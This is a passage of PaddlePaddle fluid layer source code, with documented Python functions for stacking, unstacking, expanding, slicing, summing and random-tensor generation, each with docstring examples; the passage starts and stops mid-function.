Input:
x[0].shape = [1, 2]
x[0].data = [ [1.0 , 2.0 ] ]
x[1].shape = [1, 2]
x[1].data = [ [3.0 , 4.0 ] ]
x[2].shape = [1, 2]
x[2].data = [ [5.0 , 6.0 ] ]
Attrs:
axis = 0
Output:
Out.dims = [3, 1, 2]
Out.data =[ [ [1.0, 2.0] ],
[ [3.0, 4.0] ],
[ [5.0, 6.0] ] ]
Case 2:
Input:
x[0].shape = [1, 2]
x[0].data = [ [1.0 , 2.0 ] ]
x[1].shape = [1, 2]
x[1].data = [ [3.0 , 4.0 ] ]
x[2].shape = [1, 2]
x[2].data = [ [5.0 , 6.0 ] ]
Attrs:
axis = 1 or axis = -2
Output:
Out.shape = [1, 3, 2]
Out.data =[ [ [1.0, 2.0]
[3.0, 4.0]
[5.0, 6.0] ] ]
Args:
x (Variable|list(Variable)): Input :code:`x` can be a single Tensor, a :code:`list` of Tensors.
If :code:`x` is a :code:`list`, the shapes of all these Tensors
must be the same. Supposing input is N dims
Tensors :math:`[d_0, d_1, ..., d_{n-1}]`, the output is N+1 dims
Tensor :math:`[d_0, d_1, d_{axis-1}, len(x), d_{axis}, ..., d_{n-1}]`.
Support data types: float32, float64, int32, int64.
axis (int, optional): The axis along which all inputs are stacked. ``axis`` range is :math:`[-(R+1), R+1)`.
R is the first tensor of inputs. If ``axis`` < 0, :math:`axis=axis+rank(x[0])+1`.
The default value of axis is 0.
Returns:
Variable: The stacked Tensor, has same data type with input Tensors. Output dim is :math:`rank(x[0])+1`.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import paddle.fluid.layers as layers
# set batch size=None
x1 = fluid.data(name='x1', shape=[None, 1, 2], dtype='int32')
x2 = fluid.data(name='x2', shape=[None, 1, 2], dtype='int32')
# stack Tensor list
data = layers.stack([x1,x2]) # stack according to axis 0, data.shape=[2, None, 1, 2]
data = layers.stack([x1,x2], axis=1) # stack according to axis 1, data.shape=[None, 2, 1, 2]
# stack single Tensor
data = layers.stack(x1) # stack according to axis 0, data.shape=[1, None, 1, 2]
"""
helper = LayerHelper('stack', **locals())
axis = 0 if axis is None else axis
if not isinstance(x, list) and not isinstance(x, tuple):
x = [x]
out = helper.create_variable_for_type_inference(x[0].dtype)
if not in_dygraph_mode() and \
x[0].desc.type() == core.VarDesc.VarType.LOD_TENSOR_ARRAY:
assert len(x) == 1, "If the elements of 'x' in stack are Variable(LoDTensorArray), " \
"number of the elements must be 1, but received %s." % len(x)
out_index = helper.create_variable_for_type_inference(dtype="int32")
helper.append_op(
type='tensor_array_to_tensor',
inputs={'X': x[0]},
outputs={'Out': [out],
'OutIndex': [out_index]},
attrs={'axis': axis,
'use_stack': True})
else:
helper.append_op(
type='stack',
inputs={'X': x},
outputs={'Y': out},
attrs={'axis': axis})
return out
@templatedoc(op_type="filter_by_instag")
def filter_by_instag(ins, ins_tag, filter_tag, is_lod, out_val_if_empty=0):
"""
**Filter By Instag Layer**
This function filter a batch of ins by instag,
There are multiple ins, and every ins belongs to some tags.
We can specify some tags we want. So the ins which belongs to that tags
remains in the output, and others removed.
For example, one batch has 4 ins. Every ins has its tag list.
| Ins | Ins_Tag |
|:-----:|:------:|
| 0 | 0, 1 |
| 1 | 1, 3 |
| 2 | 0, 3 |
| 3 | 2, 6 |
And Lod is [1,1,1,1]
And the filter tags [1]
From the definition above, ins which has tag 1 can pass the filter
So Ins 0 and Ins 1 can pass and be seen in the output,
Ins 2 and 3 cannot pass because they do not has tag 1.
Actually, if is_lod is false, it is normal tensor that equals to
lod_tensor with all 1, similar to the example above.
Args:
ins (Variable): Input Variable (LoDTensor), usually it is 2D tensor
And first dimension can have lod info or not.
ins_tag (Variable): Input Variable (LoDTensor), usually it is 1D list
And split them by lod info
filter_tag (Variable): Input Variable (1D Tensor/List), usually it is
list that holds the tags.
is_lod (Bool): Boolean value to indicate ins is lod tensor or not.
out_val_if_empty(Int64): If the output after filter is empty, this value
will be set to Output tensor.
Returns:
Variable: filtered ins (LoDTensor) and loss weight (Tensor)
Examples:
.. code-block:: python
import paddle.fluid.layers as layers
ins = layers.data(name='Ins', shape=[-1,32], lod_level=0, dtype='float64')
ins_tag = layers.data(name='Ins_tag', shape=[-1,16], lod_level=0, dtype='int64')
filter_tag = layers.data(name='Filter_tag', shape=[-1,16], dtype='int64')
out, loss_weight = layers.filter_by_instag(ins, ins_tag, filter_tag, True)
"""
helper = LayerHelper('filter_by_instag', **locals())
out = helper.create_variable_for_type_inference(dtype=ins.dtype)
loss_weight = helper.create_variable_for_type_inference(dtype=np.float64)
mmap = helper.create_variable_for_type_inference(dtype=ins_tag.dtype)
helper.append_op(
type='filter_by_instag',
inputs={'Ins': ins,
'Ins_tag': ins_tag,
'Filter_tag': filter_tag},
outputs={'Out': out,
'LossWeight': loss_weight,
'IndexMap': mmap},
attrs={'is_lod': is_lod,
'out_val_if_empty': out_val_if_empty})
return [out, loss_weight]
def unstack(x, axis=0, num=None):
"""
**UnStack Layer**
This layer unstacks input Tensor :code:`x` into several Tensors along :code:`axis`.
If :code:`axis` < 0, it would be replaced with :code:`axis+rank(x)`.
If :code:`num` is None, it would be inferred from :code:`x.shape[axis]`,
and if :code:`x.shape[axis]` <= 0 or is unknown, :code:`ValueError` is
raised.
Args:
x (Variable): Input Tensor. It is a N-D Tensors of data types float32, float64, int32, int64.
axis (int): The axis along which the input is unstacked.
num (int|None): The number of output variables.
Returns:
list(Variable): The unstacked Tensors list. The list elements are N-D Tensors of data types float32, float64, int32, int64.
Raises:
ValueError: If x.shape[axis] <= 0 or axis is not in range [-D, D).
Examples:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.layers.data(name='x', shape=[2, 3, 5], dtype='float32') # create a tensor with shape=[2, 3, 5]
y = fluid.layers.unstack(x, axis=1) # unstack with second axis, which results 3 tensors with shape=[2, 5]
"""
helper = LayerHelper('unstack', **locals())
if num is None:
if axis is None or x.shape[axis] <= 0:
raise ValueError('unknown unstack number')
else:
num = x.shape[axis]
outs = []
for _ in range(num):
outs.append(helper.create_variable_for_type_inference(x.dtype))
helper.append_op(
type='unstack',
inputs={'X': [x]},
outputs={'Y': outs},
attrs={'axis': axis,
'num': num})
return outs
def expand(x, expand_times, name=None):
"""
This operation tiles ``x`` multiple times according to the parameter ``expand_times``.
The times number for each dimension of ``x`` is set by the parameter ``expand_times``.
The rank of ``x`` should be less than or equal to 6. Please note that size of ``expand_times`` must be the same
with X's rank. Following is a using case:
.. code-block:: text
Input(X) is a 3-D tensor with shape [2, 3, 1]:
[
[[1], [2], [3]],
[[4], [5], [6]]
]
Attr(expand_times): [1, 2, 2]
Output(Out) is a 3-D tensor with shape [2, 6, 2]:
[
[[1, 1], [2, 2], [3, 3], [1, 1], [2, 2], [3, 3]],
[[4, 4], [5, 5], [6, 6], [4, 4], [5, 5], [6, 6]]
]
Args:
x (Variable): A ``Tensor`` or ``LoDTensor`` with dimension in [1, 6]. The data type is ``bool``, ``float32``, ``float64`` or ``int32`` .
expand_times (list|tuple|Variable): The data type is ``int32`` . If ``expand_times`` is a list or tuple, the elements of
it should be integers or Tensors with shape [1]. If ``expand_times`` is an Variable, it should be an 1-D Tensor.
Expand times number for each dimension of ``x`` .
name (str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name` .
Returns:
Variable: A ``Tensor`` or ``LoDTensor``. The data type is same as ``x``. After expanding, size of each dimension of output is equal to the size of the corresponding dimension of ``x`` multiplying the corresponding value given by ``expand_times`` .
Raises:
TypeError: The type of ``expand_times`` must be list, tuple or Variable.
ValueError: The elements of ``expand_times`` cannot be negative.
Examples:
.. code-block:: python
import paddle.fluid as fluid
# example 1:
data_1 = fluid.layers.fill_constant(shape=[2, 3, 1], dtype='int32', value=0)
expanded_1 = fluid.layers.expand(data_1, expand_times=[1, 2, 2])
# the shape of expanded_1 is [2, 6, 2].
# example 2:
data_2 = fluid.layers.fill_constant(shape=[12, 14], dtype="int32", value=3)
expand_times = fluid.layers.fill_constant(shape=[2], dtype="int32", value=4)
expanded_2 = fluid.layers.expand(data_2, expand_times=expand_times)
# the shape of expanded_2 is [48, 56].
"""
if in_dygraph_mode():
if isinstance(expand_times, (list, tuple)):
if utils._contain_var(expand_times):
raise TypeError(
"The type of 'expand_times' in expand must be list[int] or tuple(int) in Dygraph mode, but "
"received %s, which contains Variable." % type(shape))
else:
raise TypeError(
"The type of 'expand_times' in expand must be list[int] or tuple(int) in Dygraph mode, but "
"received %s." % type(shape))
return core.ops.expand(x, 'expand_times', expand_times)
inputs = {"X": [x]}
attrs = {}
check_variable_and_dtype(
x, 'x', ['bool', 'float32', 'float64', 'int32', 'int64'], 'expand')
check_type(expand_times, 'expand_times', (list, tuple, Variable), 'expand')
if convert_dtype(x.dtype) == 'bool' and x.stop_gradient == True:
raise ValueError(
"expand op bool date type must set the stop_gradient to be False")
helper = LayerHelper('expand', input=x, **locals())
def get_attr_expand_times(list_expand_times):
attrs_expand_times = []
for idx, times in enumerate(list_expand_times):
if isinstance(times, Variable):
attrs_expand_times.append(-1)
else:
attrs_expand_times.append(times)
assert times > 0, (
"Each element given in expand_times must not be negative.")
return attrs_expand_times
def get_new_expand_times_tensor(list_expand_times):
new_expand_times_tensor = []
for ele in list_expand_times:
if isinstance(ele, Variable):
ele.stop_gradient = True
new_expand_times_tensor.append(ele)
else:
assert (isinstance(ele, int))
temp_out = helper.create_variable_for_type_inference('int32')
fill_constant([1], 'int32', ele, force_cpu=True, out=temp_out)
new_expand_times_tensor.append(temp_out)
return new_expand_times_tensor
if isinstance(expand_times, Variable):
expand_times.stop_gradient = True
inputs['ExpandTimes'] = expand_times
elif isinstance(expand_times, (list, tuple)):
attrs['expand_times'] = get_attr_expand_times(expand_times)
if utils._contain_var(expand_times):
inputs['expand_times_tensor'] = get_new_expand_times_tensor(
expand_times)
dtype = helper.input_dtype(input_param_name='x')
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='expand', inputs=inputs, outputs={'Out': out}, attrs=attrs)
return out
def expand_as(x, target_tensor, name=None):
"""
expand_as operator tiles to the input by given expand tensor. You should set expand tensor
for each dimension by providing tensor 'target_tensor'. The rank of X
should be in [1, 6]. Please note that size of 'target_tensor' must be the same
with X's rank. Following is a using case:
.. code-block:: text
Input(X) is a 3-D tensor with shape [2, 3, 1]:
[
[[1], [2], [3]],
[[4], [5], [6]]
]
target_tensor's shape: [2, 6, 2]
Output(Out) is a 3-D tensor with shape [2, 6, 2]:
[
[[1, 1], [2, 2], [3, 3], [1, 1], [2, 2], [3, 3]],
[[4, 4], [5, 5], [6, 6], [4, 4], [5, 5], [6, 6]]
]
Args:
x (Variable): A Tensor with dtype float64, float32, int32.
A tensor with rank in [1, 6].
target_tensor (Variable): A Tensor with dtype float64, float32, int32.
target_tensor for expanding to Input(X). Only use target_tensor'shape.
Returns:
Variable: A Tensor with dtype float64, float32, int32.
After expanding, size of each dimension of Output(Out) is equal to the size
of the corresponding dimension of target_tensor multiplying the corresponding
value given by target_tensor.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
data = fluid.layers.data(name="data", shape=[-1,10], dtype='float64')
target_tensor = fluid.layers.data(
name="target_tensor", shape=[-1,20], dtype='float64')
result = fluid.layers.expand_as(x=data, target_tensor=target_tensor)
use_cuda = False
place = fluid.CUDAPlace(0) if use_cuda else fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
x = np.random.rand(3,10)
y = np.random.rand(3,20)
output= exe.run(feed={"data":x,"target_tensor":y},fetch_list=[result.name])
print(output[0].shape)
#(3,20)
"""
helper = LayerHelper('expand_as', input=x, **locals())
dtype = helper.input_dtype(input_param_name='x')
out = helper.create_variable_for_type_inference(dtype)
inputs = {'X': x, 'target_tensor': target_tensor}
helper.append_op(type='expand_as', inputs=inputs, outputs={'Out': out})
return out
from paddle.fluid.framework import convert_np_dtype_to_dtype_
@templatedoc()
def uniform_random_batch_size_like(input,
shape,
dtype='float32',
input_dim_idx=0,
output_dim_idx=0,
min=-1.0,
max=1.0,
seed=0):
"""
This OP initializes a variable with random values sampled from a
uniform distribution in the range [min, max). The input_dim_idx used to get the input dimension value which will be used to resize the output dimension.
.. code-block:: text
*Case 1:
Given:
input =[[0.946741 , 0.1357001 , 0.38086128]] # input.shape=[1,3]
shape=[2,4]
result.shape[output_dim_idx] = input.shape[input_dim_idx],
output_dim_idx = 0,
input_dim_idx = 0,
result.shape[0] = input.shape[0],
then:
result=[[ 0.3443427 , -0.23056602, 0.3477049 , 0.06139076]] # result.shape=[1,4]
*Case 2:
Given:
input =[[0.946741 , 0.1357001 , 0.38086128]] # input.shape=[1,3]
shape=[2,4]
input_dim_idx=1
output_dim_idx=1
result.shape[output_dim_idx] = input.shape[input_dim_idx],
output_dim_idx = 1,
input_dim_idx = 1,
result.shape[1] = input.shape[1],
then:
result=[[-0.23133647, -0.84195036, 0.21441269],
[-0.08774924, 0.25605237, -0.09403259]] # result.shape=[2,3]
Args:
input (Variable): A Tensor. Supported data types: float32, float64.
shape (tuple|list): A python list or python tuple. The shape of the output Tensor, the data type is int.
input_dim_idx (int, optional): An index used to get the input dimension value which will be used to resize the output dimension. Default 0.
output_dim_idx (int, optional): An index used to indicate the specific dimension that will be replaced by corresponding input dimension value. Default 0.
min (float, optional): The lower bound on the range of random values to generate, the min is included in the range. Default -1.0.
max (float, optional): The upper bound on the range of random values to generate, the max is excluded in the range. Default 1.0.
seed (int, optional): Random seed used for generating samples. 0 means use a seed generated by the system.Note that if seed is not 0, this operator will always generate the same random numbers every time.
dtype(np.dtype|core.VarDesc.VarType|str, optional): The data type of output Tensor. Supported data types: float32, float64. Default float32.
Returns:
Variable: A Tensor of the specified shape filled with uniform_random values. The shape of the Tensor is determined by the shape parameter and the specified dimension of the input Tensor.
Examples:
.. code-block:: python
import paddle.fluid as fluid
# example 1:
input = fluid.data(name="input", shape=[1, 3], dtype='float32')
out_1 = fluid.layers.uniform_random_batch_size_like(input, [2, 4]) # out_1.shape=[1, 4]
# example 2:
out_2 = fluid.layers.uniform_random_batch_size_like(input, [2, 4], input_dim_idx=1, output_dim_idx=1) # out_2.shape=[2, 3]
"""
helper = LayerHelper('uniform_random_batch_size_like', **locals())
out = helper.create_variable_for_type_inference(dtype)
c_dtype = convert_np_dtype_to_dtype_(dtype)
helper.append_op(
type='uniform_random_batch_size_like',
inputs={'Input': input},
outputs={'Out': out},
attrs={
'shape': shape,
'input_dim_idx': input_dim_idx,
'output_dim_idx': output_dim_idx,
'min': min,
'max': max,
'seed': seed,
'dtype': c_dtype
})
return out
@templatedoc()
def gaussian_random(shape, mean=0.0, std=1.0, seed=0, dtype='float32'):
"""
Generate a random tensor whose data is drawn from a Gaussian distribution.
Args:
shape (Tuple[int] | List[int]): Shape of the generated random tensor.
mean (float): Mean of the random tensor, defaults to 0.0.
std (float): Standard deviation of the random tensor, defaults to 1.0.
seed (int): ${seed_comment}
dtype(np.dtype | core.VarDesc.VarType | str): Output data type, float32 or float64.
Returns:
Variable: Random tensor whose data is drawn from a Gaussian distribution, dtype: flaot32 or float64 as specified.
Examples:
.. code-block:: python
# declarative mode
import numpy as np
from paddle import fluid
x = fluid.layers.gaussian_random((2, 3), std=2., seed=10)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
start = fluid.default_startup_program()
main = fluid.default_main_program()
exe.run(start)
x_np, = exe.run(main, feed={}, fetch_list=[x])
x_np
# array([[2.3060477, 2.676496 , 3.9911983],
# [0.9990833, 2.8675377, 2.2279181]], dtype=float32)
.. code-block:: python
# imperative mode
import numpy as np
from paddle import fluid
import paddle.fluid.dygraph as dg
place = fluid.CPUPlace()
with dg.guard(place) as g:
x = fluid.layers.gaussian_random((2, 4), mean=2., dtype="float32", seed=10)
x_np = x.numpy()
x_np
# array([[2.3060477 , 2.676496 , 3.9911983 , 0.9990833 ],
# [2.8675377 , 2.2279181 , 0.79029655, 2.8447366 ]], dtype=float32)
"""
helper = LayerHelper('gaussian_random', **locals())
out = helper.create_variable_for_type_inference(dtype)
c_dtype = convert_np_dtype_to_dtype_(dtype)
helper.append_op(
type='gaussian_random',
outputs={'Out': out},
attrs={
'shape': shape,
'mean': mean,
'std': std,
'seed': seed,
'dtype': c_dtype,
'use_mkldnn': False
})
return out
@templatedoc()
def sampling_id(x, min=0.0, max=1.0, seed=0, dtype='float32'):
"""
This op is used for sampling id from multinomial distribution from the input, sampling one id for one sample.
Parameters:
x (Variable): 2-D tensor, [batch_size, input_feature_dimensions]
min (Float): minimum , default 0.0.
max (Float): maximum, default 1.0.
seed (Float): Random seed, default 0. if seed is not 0, will generate same number every time.
dtype(np.dtype|core.VarDesc.VarType|str): The type of output data : float32, float_16, int etc
Returns:
Variable: sampling tensor.
Examples:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.data(
name="X",
shape=[13, 11],
dtype='float32')
out = fluid.layers.sampling_id(x)
"""
helper = LayerHelper('sampling_id', **locals())
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='sampling_id',
inputs={'X': x},
outputs={'Out': out},
attrs={'min': min,
'max': max,
'seed': seed})
return out
@templatedoc()
def gaussian_random_batch_size_like(input,
shape,
input_dim_idx=0,
output_dim_idx=0,
mean=0.0,
std=1.0,
seed=0,
dtype='float32'):
"""
${comment}
Args:
input (Variable): ${input_comment}
shape (tuple|list): ${shape_comment}
input_dim_idx (int): ${input_dim_idx_comment}
output_dim_idx (int): ${output_dim_idx_comment}
mean (float): ${mean_comment}
std (float): ${std_comment}
seed (int): ${seed_comment}
dtype(np.dtype|core.VarDesc.VarType|str): The type of output data, float32 or float_64.
Returns:
out (Variable): ${out_comment}
Examples:
.. code-block:: python
import paddle.fluid as fluid
input = fluid.data(name="input", shape=[13, 11], dtype='float32')
out = fluid.layers.gaussian_random_batch_size_like(
input, shape=[-1, 11], mean=1.0, std=2.0)
"""
helper = LayerHelper('gaussian_random_batch_size_like', **locals())
out = helper.create_variable_for_type_inference(dtype)
c_dtype = convert_np_dtype_to_dtype_(dtype)
helper.append_op(
type='gaussian_random_batch_size_like',
inputs={'Input': input},
outputs={'Out': out},
attrs={
'shape': shape,
'input_dim_idx': input_dim_idx,
'output_dim_idx': output_dim_idx,
'mean': mean,
'std': std,
'seed': seed,
'dtype': c_dtype
})
return out
@templatedoc()
def sum(x):
"""
${comment}
Case 1:
::
Input:
Input. Shape = [2, 3]
Input = [[1, 2, 3],
[4, 5, 6]]
Output:
The output. Shape = [2, 3]
Output = [[1, 2, 3],
[4, 5, 6]]
Case 2:
::
Input:
First input:
Input1. Shape = [2, 3]
Input1 = [[1, 2, 3],
[4, 5, 6]]
The second input:
Input2. Shape = [2, 3]
Input2 = [[7, 8, 9],
[10, 11, 12]]
Output:
The output. Shape = [2, 3]
Output = [[8, 10, 12],
[14, 16, 18]]
Args:
x (Variable|list(Variable)): ${x_comment}
Returns:
Variable: ${out_comment}
Examples:
.. code-block:: python
import paddle.fluid as fluid
input0 = fluid.layers.fill_constant(shape=[2, 3], dtype='int64', value=5)
input1 = fluid.layers.fill_constant(shape=[2, 3], dtype='int64', value=3)
sum = fluid.layers.sum([input0, input1])
# You can print out 'sum' via executor.
out = fluid.layers.Print(sum, message="the sum of input0 and input1: ")
exe = fluid.Executor(fluid.CPUPlace())
exe.run(fluid.default_main_program())
# The printed result is:
# 1570701754 the sum of input0 and input1: The place is:CPUPlace
# Tensor[sum_0.tmp_0]
# shape: [2,3,]
# dtype: l
# data: 8,8,8,8,8,8,
# the sum of input0 and input1 is 2-D Tensor with shape [2,3].
# dtype is the corresponding C++ data type, which may vary in different environments.
# Eg: if the data type of tensor is int64, then the corresponding C++ data type is int64_t,
# so the dtype value is typeid(int64_t).Name(), which is 'x' on MacOS, 'l' on Linux,
# and '__int64' on Windows. They both represent 64-bit integer variables.
"""
return paddle.elementwise_sum(x)
@templatedoc()
def slice(input, axes, starts, ends):
"""
This operator produces a slice of ``input`` along multiple axes. Similar to numpy:
https://docs.scipy.org/doc/numpy/reference/arrays.indexing.html
Slice uses ``axes``, ``starts`` and ``ends`` attributes to specify the start and
end dimension for each axis in the list of axes and Slice uses this information
to slice the input data tensor. If a negative value is passed to
``starts`` or ``ends`` such as :math:`-i`, it represents the reverse position of the
axis :math:`i-1` (here 0 is the initial position).
If the value passed to ``starts`` or ``ends`` is greater than n
(the number of elements in this dimension), it represents n.
For slicing to the end of a dimension with unknown size, it is recommended
to pass in INT_MAX. The size of ``axes`` must be equal to ``starts`` and ``ends``.
Following examples will explain how slice works:
.. code-block:: text
Case1:
Given:
data = [ [1, 2, 3, 4], [5, 6, 7, 8], ]
axes = [0, 1]
starts = [1, 0]
ends = [2, 3]
Then:
result = [ [5, 6, 7], ]
Case2:
Given:
data = [ [1, 2, 3, 4], [5, 6, 7, 8], ]
axes = [0, 1]
starts = [0, 1]
ends = [-1, 1000] # -1 denotes the reverse 0th position of dimension 0.
Then:
result = [ [2, 3, 4], ] # result = data[0:1, 1:4]
Args:
input (Variable): A ``Tensor`` or ``LoDTensor`` . The data type is ``float16``, ``float32``, ``float64``, ``int32`` or ``int64``.
axes (list|tuple): The data type is ``int32`` . Axes that `starts` and `ends` apply to.
It's optional. If it is not provides, it will be treated as :math:`[0,1,...,len(starts)-1]`.
starts (list|tuple|Variable): The data type is ``int32`` . If ``starts`` is a list or tuple, the elements of
it should be integers or Tensors with shape [1]. If ``starts`` is an Variable, it should be an 1-D Tensor.
It represents starting indices of corresponding axis in ``axes``.
ends (list|tuple|Variable): The data type is ``int32`` . If ``ends`` is a list or tuple, the elements of
it should be integers or Tensors with shape [1]. If ``ends`` is an Variable, it should be an 1-D Tensor .
It represents ending indices of corresponding axis in ``axes``.
Returns:
Variable: A ``Tensor`` or ``LoDTensor``. The data type is same as ``input``.
Raises:
TypeError: The type of ``starts`` must be list, tuple or Variable.
TypeError: The type of ``ends`` must be list, tuple or Variable.
Examples:
.. code-block:: python
import paddle.fluid as fluid
input = fluid.data(
name="input", shape=[4, 5, 6], dtype='float32')
# example 1:
# attr starts is a list which doesn't contain tensor Variable.
axes = [0, 1, 2]
starts = [-3, 0, 2]
ends = [3, 2, 4]
sliced_1 = fluid.layers.slice(input, axes=axes, starts=starts, ends=ends)
# sliced_1 is input[0:3, 0:2, 2:4].
# example 2:
# attr starts is a list which contain tensor Variable.
minus_3 = fluid.layers.fill_constant([1], "int32", -3)
sliced_2 = fluid.layers.slice(input, axes=axes, starts=[minus_3, 0, 2], ends=ends)
# sliced_2 is input[0:3, 0:2, 2:4].
"""
if in_dygraph_mode():
infer_flags = list(1 for i in range(len(axes)))
if isinstance(starts, (list, tuple)):
if utils._contain_var(starts):
raise TypeError(
"The type of 'starts' in slice must be list[int] or tuple(int) in Dygraph mode, but "
"received %s, which contains Variable." % type(shape))
else:
raise TypeError(
"The type of 'starts' in slice must be list[int] or tuple(int) in Dygraph mode, but "
"received %s." % type(shape))
if isinstance(ends, (list, tuple)):
if utils._contain_var(ends):
raise TypeError(
"The type of 'ends' in slice must be list[int] or tuple(int) in Dygraph mode, but "
"received %s, which contains Variable." % type(shape))
else:
raise TypeError(
"The type of 'ends' in slice must be list[int] or tuple(int) in Dygraph mode, but "
"received %s." % type(shape))
return core.ops.slice(input, 'axes', axes, 'starts', starts, 'ends',
ends, 'infer_flags', infer_flags)
if not isinstance(starts, (list, tuple, Variable)):
raise ValueError(
"Input starts must be an Variable, python list or tuple.")
if not isinstance(ends, (list, tuple, Variable)):
raise ValueError(
"Input ends must be an Variable, python list or tuple.")
helper = LayerHelper('slice', **locals())
def get_new_list_tensor(old_list):
new_list_tensor = []
for dim in old_list:
if isinstance(dim, Variable):
dim.stop_gradient = True
new_list_tensor.append(dim)
else:
assert (isinstance(dim, int))
temp_out = helper.create_variable_for_type_inference('int32')
fill_constant([1], 'int32', dim, force_cpu=True, out=temp_out)
new_list_tensor.append(temp_out)
return new_list_tensor
inputs = {'Input': input}
attrs = {'axes': axes}
infer_flags = list(1 for i in range(len(axes)))
# starts
if isinstance(starts, Variable):
starts.stop_gradient = True
inputs['StartsTensor'] = starts
infer_flags = list(-1 for i in range(len(axes)))
elif isinstance(starts, (list, tuple)):
attrs['starts'] = []
if utils._contain_var(starts):
inputs['StartsTensorList'] = get_new_list_tensor(starts)
for i, dim in enumerate(starts):
if isinstance(dim, Variable):
attrs['starts'].append(-1)
infer_flags[i] = -1
else:
attrs['starts'].append(dim)
else:
attrs['starts'] = starts
# ends
if isinstance(ends, Variable):
ends.stop_gradient = True
inputs['EndsTensor'] = ends
infer_flags = list(-1 for i in range(len(axes)))
elif isinstance(ends, (list, tuple)):
attrs['ends'] = []
if utils._contain_var(ends):
inputs['EndsTensorList'] = get_new_list_tensor(ends)
for i, dim in enumerate(ends):
if isinstance(dim, Variable):
attrs['ends'].append(-1)
infer_flags[i] = -1
else:
attrs['ends'].append(dim)
else:
attrs['ends'] = ends
# infer_flags
attrs['infer_flags'] = infer_flags
out = helper.create_variable_for_type_inference(
dtype=helper.input_dtype('input'))
helper.append_op(
type='slice', inputs=inputs, attrs=attrs, outputs={'Out': out})
return out
@templatedoc()
def strided_slice(input, axes, starts, ends, strides):
"""
This operator produces a slice of ``input`` along multiple axes. Similar to numpy:
https://docs.scipy.org/doc/numpy/reference/arrays.indexing.html
Slice uses ``axes``, ``starts`` and ``ends`` attributes to specify the start and
end dimension for each axis in the list of axes and Slice uses this information
to slice the input data tensor. If a negative value is passed to
``starts`` or ``ends`` such as :math:`-i`, it represents the reverse position of the
axis :math:`i-1` th(here 0 is the initial position). The ``strides`` represents steps of
slicing and if the ``strides`` is negative, slice operation is in the opposite direction.
If the value passed to ``starts`` or ``ends`` is greater than n
(the number of elements in this dimension), it represents n.
For slicing to the end of a dimension with unknown size, it is recommended
to pass in INT_MAX. The size of ``axes`` must be equal to ``starts`` , ``ends`` and ``strides``.
Following examples will explain how strided_slice works:
.. code-block:: text
Case1:
Given:
data = [ [1, 2, 3, 4], [5, 6, 7, 8], ]
axes = [0, 1]
starts = [1, 0]
ends = [2, 3]
strides = [1, 1]
Then:
result = [ [5, 6, 7], ]
Case2:
Given:
data = [ [1, 2, 3, 4], [5, 6, 7, 8], ]
axes = [0, 1]
starts = [0, 1]
ends = [2, 0]
strides = [1, -1]
Then:
result = [ [8, 7, 6], ]
Case3:
Given:
data = [ [1, 2, 3, 4], [5, 6, 7, 8], ]
axes = [0, 1]
starts = [0, 1]
ends = [-1, 1000]
strides = [1, 3]
Then:
result = [ [2], ]
Args:
input (Variable): An N-D ``Tensor`` or ``LoDTensor`` . The data type is ``float32``, ``float64``, ``int32`` or ``int64``.
axes (list|tuple): The data type is ``int32`` . Axes that `starts` and `ends` apply to.
It's optional. If it is not provides, it will be treated as :math:`[0,1,...,len(starts)-1]`.
starts (list|tuple|Variable): The data type is ``int32`` . If ``starts`` is a list or tuple, the elements of
it should be integers or Tensors with shape [1]. If ``starts`` is an Variable, it should be an 1-D Tensor.
It represents starting indices of corresponding axis in ``axes``.
ends (list|tuple|Variable): The data type is ``int32`` . If ``ends`` is a list or tuple, the elements of
it should be integers or Tensors with shape [1]. If ``ends`` is an Variable, it should be an 1-D Tensor .
It represents ending indices of corresponding axis in ``axes``.
strides (list|tuple|Variable): The data type is ``int32`` . If ``strides`` is a list or tuple, the elements of
it should be integers or Tensors with shape [1]. If ``strides`` is an Variable, it should be an 1-D Tensor .
It represents slice step of corresponding axis in ``axes``.
Returns:
Variable: A ``Tensor`` or ``LoDTensor`` with the same dimension as ``input``. The data type is same as ``input``.
Raises:
TypeError: The type of ``starts`` must be list, tuple or Variable.
TypeError: The type of ``ends`` must be list, tuple or Variable.
TypeError: The type of ``strides`` must be list, tuple or Variable.
Examples:
.. code-block:: python
import paddle.fluid as fluid
input = fluid.data(
name="input", shape=[3, 4, 5, 6], dtype='float32')
# example 1:
# attr starts is a list which doesn't contain tensor Variable.
axes = [0, 1, 2]
starts = [-3, 0, 2]
ends = [3, 2, 4]
strides_1 = [1, 1, 1]
strides_2 = [1, 1, 2]
sliced_1 = fluid.layers.strided_slice(input, axes=axes, starts=starts, ends=ends, strides=strides_1)
# sliced_1 is input[:, 0:3:1, 0:2:1, 2:4:1].
# example 2:
# attr starts is a list which contain tensor Variable.
minus_3 = fluid.layers.fill_constant([1], "int32", -3)
sliced_2 = fluid.layers.strided_slice(input, axes=axes, starts=[minus_3, 0, 2], ends=ends, strides=strides_2)
# sliced_2 is input[:, 0:3:1, 0:2:1, 2:4:2].
"""
if not isinstance(starts, (list, tuple, Variable)):
raise ValueError(
"Input starts must be an Variable, python list or tuple.")
if not isinstance(ends, (list, tuple, Variable)):
raise ValueError(
"Input ends must be an Variable, python list or tuple.")
if not isinstance(strides, (list, tuple, Variable)):
raise ValueError(
"Input strides must be an Variable, python list or tuple.")
helper = LayerHelper('strided_slice', **locals())
def get_new_list_tensor(old_list):
new_list_tensor = []
for dim in old_list:
if isinstance(dim, Variable):
dim.stop_gradient = True
new_list_tensor.append(dim)
else:
assert (isinstance(dim, int))
temp_out = helper.create_variable_for_type_inference('int32')
fill_constant([1], 'int32', dim, force_cpu=True, out=temp_out)
new_list_tensor.append(temp_out)
return new_list_tensor
inputs = {'Input': input}
attrs = {'axes': axes}
infer_flags = list(1 for i in range(len(axes)))
if in_dygraph_mode():
inputs = {'Input': input}
attrs = {
'axes': axes,
'starts': starts,
'ends': ends,
'strides': strides,
'infer_flags': infer_flags
}
else:
# starts
if isinstance(starts, Variable):
starts.stop_gradient = True
inputs['StartsTensor'] = starts
elif isinstance(starts, (list, tuple)):
attrs['starts'] = []
if utils._contain_var(starts):
inputs['StartsTensorList'] = get_new_list_tensor(starts)
for i, dim in enumerate(starts):
if isinstance(dim, Variable):
